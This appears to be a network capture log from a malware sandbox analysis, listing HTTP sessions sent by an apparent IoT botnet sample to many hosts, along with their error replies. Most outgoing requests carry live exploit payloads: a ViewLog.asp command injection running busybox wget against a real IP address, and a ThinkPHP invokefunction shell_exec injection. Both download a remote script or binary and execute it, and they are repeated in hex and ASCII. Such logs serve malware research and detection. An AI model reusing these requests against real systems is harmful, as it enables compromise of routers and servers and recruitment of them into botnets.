                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:00.123476982 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        70192.168.2.143630688.247.182.12980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:00.141575098 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:00.552567005 CET401INHTTP/1.1 404 Not Found
                                                        Server: micro_httpd
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Date: Wed, 14 Feb 2024 11:32:59 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        71192.168.2.144294488.218.251.24880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:00.359190941 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:00.604216099 CET49INHTTP/1.1 404 Site or Page Not Found
                                                        Feb 14, 2024 09:33:00.604306936 CET306INData Raw: 53 65 72 76 65 72 3a 20 44 56 52 44 56 53 2d 57 65 62 73 0d 0a 44 61 74 65 3a 20 57 65 64 20 46 65 62 20 31 34 20 31 31 3a 31 32 3a 35 33 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72
                                                        Data Ascii: Server: DVRDVS-WebsDate: Wed Feb 14 11:12:53 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/html<html><head><title>Document Error: Site or Page Not Found</title></head><body><h2>Access Error: Site or Page Not Fou


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        72192.168.2.144945031.200.35.148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:00.625783920 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        73192.168.2.145116694.121.64.328080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:00.626523018 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        74192.168.2.143368231.200.110.1198080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:00.626611948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        75192.168.2.143634488.247.182.12980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:00.648509026 CET421INHTTP/1.1 408 Request Timeout
                                                        Server: micro_httpd
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Date: Wed, 14 Feb 2024 11:32:59 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 6f 75 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 6f 75 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>408 Request Timeout</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>408 Request Timeout</H4>No request found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        76192.168.2.143393631.24.86.98080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:00.663649082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:02.121160984 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:03.849107981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:07.305141926 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:14.216837883 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:28.040091991 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:56.199048042 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        77192.168.2.145269494.187.114.788080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:00.842221975 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        78192.168.2.143918695.181.173.2158080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:01.300378084 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:01.474967957 CET113INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 08:33:01 GMT
                                                        Content-Length: 0
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        79192.168.2.144443662.202.156.1688080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:01.324193954 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        80192.168.2.143359231.25.152.2548080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:01.336605072 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:01.544295073 CET1255INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 1106
                                                        Date: Wed, 14 Feb 2024 08:33:01 GMT
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 33 39 20 28 55 62 75 6e 74 75 29 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> &#47;cgi-bin&#47;ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/8.5.39 (Ubuntu)</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        81192.168.2.146039695.84.240.468080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:01.360317945 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:01.605793953 CET259INHTTP/1.1 501 Not Implemented
                                                        Connection: Keep-Alive
                                                        Content-Length: 121
                                                        Date: Wed, 14 Feb 2024 08:32:57 GMT
                                                        Expires: 0
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><title>Error 501: Not Implemented</title></head><body><h1>Error 501: Not Implemented</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        82192.168.2.144287062.29.56.1948080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:01.377280951 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        83192.168.2.143549431.136.57.388080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:01.504280090 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
